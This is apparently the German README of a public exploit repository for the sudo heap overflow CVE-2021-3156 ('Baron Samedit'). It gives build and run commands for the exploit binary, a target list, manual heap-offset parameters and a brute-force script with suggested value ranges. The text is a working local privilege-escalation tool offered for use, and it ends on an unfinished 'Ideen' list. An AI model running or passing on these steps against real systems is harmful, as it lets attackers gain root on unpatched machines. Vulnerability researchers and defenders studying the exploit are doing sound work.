
Dies ist ein Exploit für die CVE-2021-3156-Schwachstelle in sudo (von Qualys als Baron Samedit bezeichnet).
build:
$ make
Liste der Ziele:
$ ./sudo-hax-me-a-sandwich
run:
$ ./sudo-hax-me-a-sandwich <target_number>
manueller Modus:
$ ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
Stellen Sie sicher, dass GNU parallel installiert ist.
$ make brute
$ ./brute.sh <smash_start> <smash_end> <null_start> <null_end> <lc_start> <lc_end>
Einige Muster zum Ausprobieren:
$ ./brute.sh 90 120 50 70 150 300
Es verbraucht alle verfügbaren Kerne. Versuchen Sie nicht, Netflix & Brute zu machen.
Tragen Sie zum Repository bei. Sende eine (sinnvolle) PR, ich kann sie mergen. Lasst einen Stern da.
Einige Ideen: